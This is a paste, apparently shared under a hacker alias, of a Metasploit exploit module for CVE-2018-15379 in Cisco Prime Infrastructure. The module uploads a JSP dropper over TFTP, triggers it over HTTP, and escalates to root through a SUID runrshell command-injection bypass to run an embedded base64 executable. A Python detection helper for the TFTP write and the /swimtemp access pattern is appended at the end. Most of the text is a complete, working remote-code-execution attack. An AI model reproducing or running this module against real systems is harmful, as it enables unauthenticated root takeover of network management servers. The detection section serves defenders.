[CISCO PRIME INFRASTRUCTURE LOADER] UPDATE 15/11/18

xB4ckdoorREAL, Nov 15th, 2018
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Prime Infrastructure Unauthenticated Remote Code Execution',
      'Description'    => %q{
        Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow
        an unauthenticated attacker to achieve remote code execution. The first flaw is a file
        upload vulnerability that allows the attacker to upload and execute files as the Apache
        Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions
        in a SUID binary.

        This module exploits these vulnerabilities to achieve unauthenticated remote code execution
        as root on the CPI default installation.

        This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
        might also be affected, although 3.4.0.0.348 is the latest at the time of writing.
        The file upload vulnerability should have been fixed in versions 3.4.1 and 3.3.1 Update 02.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-15379' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ],
          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ]
        ],
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        =>
        [
          [ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 04 2018'
    ))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 443]),
        OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
        OptBool.new('SSL', [true, 'Use SSL connection', true]),
        OptString.new('TARGETURI', [true, 'swimtemp path', '/swimtemp'])
      ])
  end


  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
      'method' => 'GET'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404 && res.body.length == 0
      # at the moment this is the best way to detect:
      # a 404 in swimtemp only returns the error code with a body length of 0,
      # while a 404 to another webapp or to the root returns the code plus a body with content
      return CheckCode::Detected
    end

    CheckCode::Safe
  end


  def upload_payload(payload)
    lport = datastore['LPORT'] || (1025 + rand(0xffff - 1025))
    lhost = datastore['LHOST'] || '0.0.0.0'
    remote_file = rand_text_alpha(5..16) + '.jsp'

    tftp_client = Rex::Proto::TFTP::Client.new(
      "LocalHost"  => lhost,
      "LocalPort"  => lport,
      "PeerHost"   => rhost,
      "PeerPort"   => datastore['RPORT_TFTP'],
      "LocalFile"  => "DATA:#{payload}",
      "RemoteFile" => remote_file,
      "Mode"       => 'octet',
      "Context"    => {'Msf' => self.framework, 'MsfExploit' => self},
      "Action"     => :upload
    )
    # the option registered above is RPORT_TFTP, not TFTP_PORT
    print_status "Uploading TFTP payload to #{rhost}:#{datastore['RPORT_TFTP']} as '#{remote_file}'"
    tftp_client.send_write_request

    remote_file
  end

  def generate_jsp_payload
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)

    native_payload_name = rand_text_alpha(3..9)

    var_raw     = rand_text_alpha(3..11)
    var_ostream = rand_text_alpha(3..11)
    var_pstream = rand_text_alpha(3..11)
    var_buf     = rand_text_alpha(3..11)
    var_decoder = rand_text_alpha(3..11)
    var_tmp     = rand_text_alpha(3..11)
    var_path    = rand_text_alpha(3..11)
    var_tmp2    = rand_text_alpha(3..11)
    var_path2   = rand_text_alpha(3..11)
    var_proc2   = rand_text_alpha(3..11)

    var_proc1 = rand_text_alpha(3..11)
    chmod = %Q|
    Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
    Thread.sleep(200);
    |

    var_proc3 = Rex::Text.rand_text_alpha(3..11)
    cleanup = %Q|
    Thread.sleep(200);
    Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
    |

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();

      File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
      String #{var_path2} = #{var_tmp2}.getAbsolutePath();

      PrintWriter #{var_pstream} =
        new PrintWriter(new FileOutputStream(#{var_path2}));
      #{var_pstream}.println("#!/bin/sh");
      #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
      #{var_pstream}.close();
      #{chmod}

      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    jsp = jsp.gsub(/\n/, '')
    jsp = jsp.gsub(/\t/, '')
    jsp = jsp.gsub(/\x0d\x0a/, "")
    jsp = jsp.gsub(/\x0a/, "")

    return jsp
  end


  def exploit
    jsp_payload = generate_jsp_payload

    jsp_name = upload_payload(jsp_payload)

    # we land in /opt/CSCOlumos, so we don't know the apache directory
    # as it changes between versions... so leave this commented for now
    # ... and try to find a good way to clean it later
    print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos"
    # register_files_for_cleanup(jsp_name)

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_name),
      'method' => 'GET'
    })

    handler
  end
end

# 2018-11-15#
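Defender's-side check, added here and not part of the pasted module or of the Metasploit project: the module drops its JSP with a TFTP write request (opcode 2, filename, transfer mode) and then triggers it with an HTTP GET under the /swimtemp web application using a random alphabetic name ending in .jsp, so a WRQ naming a .jsp file and an access-log hit for /swimtemp/<alpha>.jsp are both strong indicators. The log lines, WRQ bytes and the helper names (`parse_tftp_wrq`, `suspicious_tftp_write`, `find_swimtemp_jsp_hits`) are constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Indicators taken from the module above: the JSP dropper is written through a TFTP
# write request (opcode 0x0002) and then fetched via GET from /swimtemp with a random
# alphabetic file name (5-16 chars) ending in .jsp.
SWIMTEMP_JSP = re.compile(
    r'"(?:GET|POST) (/swimtemp/[A-Za-z]{5,16}\.jsp)(?:\?\S*)? HTTP/[\d.]+" (\d{3})'
)

def parse_tftp_wrq(payload: bytes) -> Optional[Tuple[str, str]]:
    """Return (filename, mode) for a TFTP WRQ (opcode 0x0002), else None."""
    if len(payload) < 4 or payload[:2] != b"\x00\x02":
        return None
    fields = payload[2:].split(b"\x00")          # filename NUL mode NUL
    if len(fields) < 2 or not fields[0]:
        return None
    return (fields[0].decode("ascii", "replace"),
            fields[1].decode("ascii", "replace").lower())

def suspicious_tftp_write(payload: bytes) -> bool:
    """A WRQ that names a .jsp file has no legitimate use on a CPI appliance."""
    parsed = parse_tftp_wrq(payload)
    return parsed is not None and parsed[0].lower().endswith(".jsp")

def find_swimtemp_jsp_hits(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, path, status) for every request to a .jsp under /swimtemp."""
    hits = []
    for line in log_lines:
        m = SWIMTEMP_JSP.search(line)
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1), m.group(2)))
    return hits

# Constructed sample data (not captured from a real system).
SAMPLE_WRQ = b"\x00\x02" + b"kQzTpw.jsp\x00" + b"octet\x00"
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Nov/2018:10:12:01 +0000] "GET /swimtemp/swimtemp HTTP/1.1" 404 0',
    '203.0.113.7 - - [15/Nov/2018:10:12:09 +0000] "GET /swimtemp/kQzTpw.jsp HTTP/1.1" 200 0',
    '198.51.100.4 - - [15/Nov/2018:10:13:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print("TFTP WRQ drops a JSP:", suspicious_tftp_write(SAMPLE_WRQ))
    for ip, path, status in find_swimtemp_jsp_hits(SAMPLE_LOG):
        print(f"{ip} fetched {path} (HTTP {status}); remove it under /opt/CSCOlumos")
```

The empty-bodied 404 for /swimtemp/swimtemp in the first sample line is what the module's check method probes for, so a 404 there followed by a .jsp GET from the same address is the full exploitation sequence and is worth correlating in the SIEM.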